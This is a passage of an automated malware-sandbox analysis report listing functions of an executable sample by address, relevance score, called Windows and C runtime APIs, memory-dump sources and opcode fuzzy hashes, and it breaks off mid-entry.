                                                            • Opcode ID: ecb6d4795bd6ab7db71324e13dbdbe24fc2c4762c378ad1b5bb23dbd8960ecc0
                                                            • Instruction ID: 40f0bb55aa69a30558f536a44f75ef36fde4f14834e27808798a29db35f06639
                                                            • Opcode Fuzzy Hash: ecb6d4795bd6ab7db71324e13dbdbe24fc2c4762c378ad1b5bb23dbd8960ecc0
                                                            • Instruction Fuzzy Hash: 4B21D8B661864287E765AF28F44137DB6A0EF80B94F544235DB9D876D5DF3CD800C711
                                                            Function 00007FF7EC1548E0 Relevance: 1.6, APIs: 1, Instructions: 64COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo
                                                            • String ID:
                                                            • API String ID: 3215553584-0
                                                            • Opcode ID: 3afeb395a215f3ec17922b2632f819625b98a9037f1372fc9655ff2c7b0df073
                                                            • Instruction ID: 11744b3edefce2343cf548d76f329c0dfce7d8a1da2404e448f3a553419c1729
                                                            • Opcode Fuzzy Hash: 3afeb395a215f3ec17922b2632f819625b98a9037f1372fc9655ff2c7b0df073
                                                            • Instruction Fuzzy Hash: D321B6A5A1C68282EA51BF95B40037DD260BF45B84F944032EF4C5BB8ADF3CD951C762
                                                            Function 00007FF7EC15E258 Relevance: 1.6, APIs: 1, Instructions: 51COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo
                                                            • String ID:
                                                            • API String ID: 3215553584-0
                                                            • Opcode ID: cd67e12c883e9f8bd43024705065033ffad1d181a756db3b5eb2a2d32994f697
                                                            • Instruction ID: c0ef383a660cbfc5e33e933ff8a5372a9717cf17a0edcc48a5da778f15c5be7d
                                                            • Opcode Fuzzy Hash: cd67e12c883e9f8bd43024705065033ffad1d181a756db3b5eb2a2d32994f697
                                                            • Instruction Fuzzy Hash: 43113ABAD5C78286F620AB59B44137AA2A5FF44384F940037EB9D46799DF3CE801C726
                                                            Function 00007FF7EC1A5B80 Relevance: 1.5, APIs: 1, Instructions: 44COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 69bddbc63fd99da0361e32bf605d9336e4230c0dde7f0018513f1afea8dd74fd
                                                            • Instruction ID: 2106657a6858a0ddc7121d8360ffdbea8b0da2b0bd048a47dd13a24f71486125
                                                            • Opcode Fuzzy Hash: 69bddbc63fd99da0361e32bf605d9336e4230c0dde7f0018513f1afea8dd74fd
                                                            • Instruction Fuzzy Hash: 14112BAA619A4581EB44AF15E080379A361EB84FA5F985133DE1E073A5CF3CD490C311
                                                            Function 00007FF7EC160414 Relevance: 1.5, APIs: 1, Instructions: 41COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 9b30da4845d5eceae66a2d6d402695b56ede85308cac44f88c52346f0b0ebdab
                                                            • Instruction ID: b3b92db0f4d06952f40c1d93b2b77527b3be532a5ee7a89f4d3f3241ca324081
                                                            • Opcode Fuzzy Hash: 9b30da4845d5eceae66a2d6d402695b56ede85308cac44f88c52346f0b0ebdab
                                                            • Instruction Fuzzy Hash: 47118FBA918646C6EA15BF54F4413ADF761EB80361FD04137E65D0A6DACFBCD005CB22
                                                            Function 00007FF7EC1548EC Relevance: 1.5, APIs: 1, Instructions: 40COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo
                                                            • String ID:
                                                            • API String ID: 3215553584-0
                                                            • Opcode ID: 818d4f054f78961d0311f8415a74e8c04cfe353b78e3df62868af38b1621707f
                                                            • Instruction ID: 274203d674984abcbb74c21c264d2150c6b651f69d9c2407b4d0a0d9244809a7
                                                            • Opcode Fuzzy Hash: 818d4f054f78961d0311f8415a74e8c04cfe353b78e3df62868af38b1621707f
                                                            • Instruction Fuzzy Hash: 990184EAE0820741FD24BAADB4123B891905F99764FA41232EB2D4B2C2CE3CE401C367
                                                            Function 00007FF7EC154970 Relevance: 1.5, APIs: 1, Instructions: 33COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo
                                                            • String ID:
                                                            • API String ID: 3215553584-0
                                                            • Opcode ID: 2d4bb694f3344be1704f8fb2f3e9680fc63ca215821e8b9c9dcb21430b87e8c8
                                                            • Instruction ID: 617f2ef9a29c3a8c4e9f9b850b0d08130c62f69c13e504ef7aa71be6bc45ad87
                                                            • Opcode Fuzzy Hash: 2d4bb694f3344be1704f8fb2f3e9680fc63ca215821e8b9c9dcb21430b87e8c8
                                                            • Instruction Fuzzy Hash: 22F0BBA9A0C14346ED2477BDB44237DA2905F45750F941132EF5E4A6C7DE3CD452C637
                                                            Function 00007FF7EC12652C Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00007FF7EC154970: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7EC154999
                                                            • FreeLibrary.KERNEL32(?,?,?,00007FF7EC16C8FE), ref: 00007FF7EC12656F
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: FreeLibrary_invalid_parameter_noinfo
                                                            • String ID:
                                                            • API String ID: 3938577545-0
                                                            • Opcode ID: 1616f9817ac4f342c8a27cae0d88970e89b0e161c3324b28999c931e150df169
                                                            • Instruction ID: 1aae0d5204c33ed4e7fbdfe28269be8024d98be29d394f55850b52d2b9f3f951
                                                            • Opcode Fuzzy Hash: 1616f9817ac4f342c8a27cae0d88970e89b0e161c3324b28999c931e150df169
                                                            • Instruction Fuzzy Hash: 75F03ADAA09A05C6EF1DEF65E09533C62A0EB58F88F540532CA0E4A189CF3CD854D262
                                                            Function 00007FF7EC144C68 Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • Concurrency::cancel_current_task.LIBCPMT ref: 00007FF7EC144C5C
                                                              • Part of subcall function 00007FF7EC145600: std::bad_alloc::bad_alloc.LIBCMT ref: 00007FF7EC145609
                                                              • Part of subcall function 00007FF7EC145600: _CxxThrowException.LIBVCRUNTIME ref: 00007FF7EC14561A
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: Concurrency::cancel_current_taskExceptionThrowstd::bad_alloc::bad_alloc
                                                            • String ID:
                                                            • API String ID: 1680350287-0
                                                            • Opcode ID: 7d825c203f33d876e0f9772e5deb8c91ddec8345425eda6b56f6c61ae83936be
                                                            • Instruction ID: 20b7117735d6ed0a902b2b4f637ed77190c18089dece9570eb3000eb51042816
                                                            • Opcode Fuzzy Hash: 7d825c203f33d876e0f9772e5deb8c91ddec8345425eda6b56f6c61ae83936be
                                                            • Instruction Fuzzy Hash: 3CE0B6EAE1910745FA68B662354537881452F58770EDC1B32ED3E4D2C2BD3CA451C532
                                                            Function 00007FF7EC19B334 Relevance: 1.5, APIs: 1, Instructions: 21fileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: FileWrite
                                                            • String ID:
                                                            • API String ID: 3934441357-0
                                                            • Opcode ID: a0a1439e265e291f150910246ad1a366446c83d0ba354e2dc0beef75c9ab4ebe
                                                            • Instruction ID: 70c5fb00fc3624608448d1b86fb19857e1b9cefd6efd8588cfd276bf638ae1ac
                                                            • Opcode Fuzzy Hash: a0a1439e265e291f150910246ad1a366446c83d0ba354e2dc0beef75c9ab4ebe
                                                            • Instruction Fuzzy Hash: 80E03966608A9183D720DB06F44031AE770FB8ABC8F944526EF8C47B19CF7DC551CB80
                                                            Function 00007FF7EC123EB4 Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: LongNamePath
                                                            • String ID:
                                                            • API String ID: 82841172-0
                                                            • Opcode ID: 637964e6b351f452a28879436c201a5e99f96031ec26c8877a7972d1003a59f1
                                                            • Instruction ID: fe2c21c0115b9e48ba4cfa207838feb7cf8915dc336e24615edb9d9e3aedd382
                                                            • Opcode Fuzzy Hash: 637964e6b351f452a28879436c201a5e99f96031ec26c8877a7972d1003a59f1
                                                            • Instruction Fuzzy Hash: DDE0D866B0874281DB21A729F144399A361FB8C7C4F444032EE8C4375ADD7CC584CB11
                                                            Function 00007FF7EC125D88 Relevance: 1.5, APIs: 1, Instructions: 19windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: IconNotifyShell_
                                                            • String ID:
                                                            • API String ID: 1144537725-0
                                                            • Opcode ID: 8549ef6000eb42c958f03a95ba6a5408167db34924d740ad0d6437c30ec5f920
                                                            • Instruction ID: 31c6591578c5d731b9d363586fdb94db52a20d1b72c54ee39e8e8f8e10c8b59e
                                                            • Opcode Fuzzy Hash: 8549ef6000eb42c958f03a95ba6a5408167db34924d740ad0d6437c30ec5f920
                                                            • Instruction Fuzzy Hash: 4DF0826991978587E771AB54F844369B6A8F784308FC40036D19D0A399DE3CD305CF11
                                                            Function 00007FF7EC121080 Relevance: 1.5, APIs: 1, Instructions: 17COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: Open_onexit
                                                            • String ID:
                                                            • API String ID: 3030063568-0
                                                            • Opcode ID: b140cdc24b49e8f2daa3c32c26d085363ec4fbb544eeb351244c2f0ff3a01b4f
                                                            • Instruction ID: 515a9ff13f555af8fd16a439996fbfaa364939037c197206198b0306c2704fdd
                                                            • Opcode Fuzzy Hash: b140cdc24b49e8f2daa3c32c26d085363ec4fbb544eeb351244c2f0ff3a01b4f
                                                            • Instruction Fuzzy Hash: 1EE08C98F1A64B80EE04BB69E88527492957F51305FC05537C41C8A351EE3CD2A1C322
                                                            Function 00007FF7EC121048 Relevance: 1.5, APIs: 1, Instructions: 13COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: _onexit
                                                            • String ID:
                                                            • API String ID: 572287377-0
                                                            • Opcode ID: 773ed23fe7bc1dd7e8b75972c2a26041a0abafe16c5f42d1a8e6024edf34d541
                                                            • Instruction ID: 35d484582cc65aa68882b7d7df8f4fd760ef1265ffeda284bc2412bc4d29f287
                                                            • Opcode Fuzzy Hash: 773ed23fe7bc1dd7e8b75972c2a26041a0abafe16c5f42d1a8e6024edf34d541
                                                            • Instruction Fuzzy Hash: 19C01288E5A04BC1E90873BAA88727441911FA9300FD04577C40D84282ED3C51E68773
                                                            Function 00007FF7EC121064 Relevance: 1.5, APIs: 1, Instructions: 13COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: _onexit
                                                            • String ID:
                                                            • API String ID: 572287377-0
                                                            • Opcode ID: 5447c473e94d7294484c99fc93f4d38cb7bf7a8a438e953c913b8a13f1fa59d2
                                                            • Instruction ID: e1db748d297af1f37f12bf0c3e2d81c15600678a702c7f3b6c66dac36fe6b5ba
                                                            • Opcode Fuzzy Hash: 5447c473e94d7294484c99fc93f4d38cb7bf7a8a438e953c913b8a13f1fa59d2
                                                            • Instruction Fuzzy Hash: ABC0128DE6A04BC1E50873BAAC8627841911FE5300FD00177C40D85292ED3C51E6C733
                                                            Function 00007FF7EC1210E8 Relevance: 1.5, APIs: 1, Instructions: 13COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: Process$CurrentVersionWow64_onexit
                                                            • String ID:
                                                            • API String ID: 2932345936-0
                                                            • Opcode ID: 03ad02108163b1b9c24d53c6048626981572e85475d5139af19f078af1ef234b
                                                            • Instruction ID: 6d1b0343967c661d8f63fb02f90cc7f6125385f275189a394e7d8add0dc3cb22
                                                            • Opcode Fuzzy Hash: 03ad02108163b1b9c24d53c6048626981572e85475d5139af19f078af1ef234b
                                                            • Instruction Fuzzy Hash: C3C01288E6A08B81E60873BA68862B451906FA5300FD00137D51D84282FD3C51E68633
                                                            Function 00007FF7EC1A7E48 Relevance: 1.4, APIs: 1, Instructions: 163COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: ErrorLast
                                                            • String ID:
                                                            • API String ID: 1452528299-0
                                                            • Opcode ID: b1ea28e244f60b4af54ff34aaaf102a183879d86c5d4002b95e89690f8712e5a
                                                            • Instruction ID: e2b2961480dda3f36d406d5c9885158dbfa2c75e4b49350fe8501d95a4ed679b
                                                            • Opcode Fuzzy Hash: b1ea28e244f60b4af54ff34aaaf102a183879d86c5d4002b95e89690f8712e5a
                                                            • Instruction Fuzzy Hash: 26718A6AB04B4285EB14FF65E0903FCA3A0EB48B88F844532DE1D577A6DF38D555C362
                                                            Function 00007FF7EC15DDA8 Relevance: 1.3, APIs: 1, Instructions: 36memoryCOMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: AllocHeap
                                                            • String ID:
                                                            • API String ID: 4292702814-0
                                                            • Opcode ID: 56853fc6be513b26808fd6ceb43c2b1e56f5d2842f756231a7c5debb2bb5ead3
                                                            • Instruction ID: e4cd42c21ec635581f7421255a0d065429ce0404cd41e369ce718d573d32273c
                                                            • Opcode Fuzzy Hash: 56853fc6be513b26808fd6ceb43c2b1e56f5d2842f756231a7c5debb2bb5ead3
                                                            • Instruction Fuzzy Hash: C7F0FF9CB09207C1FE55B76966153F59295AF54B40FD84433CA0E8A2D5ED7CE445C332
                                                            Function 00007FF7EC15C51C Relevance: 1.3, APIs: 1, Instructions: 29memoryCOMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: AllocHeap
                                                            • String ID:
                                                            • API String ID: 4292702814-0
                                                            • Opcode ID: d6cab95e1f74feff6e8dd6f9a30a9cf55c0df8872244003ab96fdfaeeafef6ec
                                                            • Instruction ID: 99c3be001f0a30bc14fb0471664eea4d4ade15d5779f359e36022dfeaa6dde4d
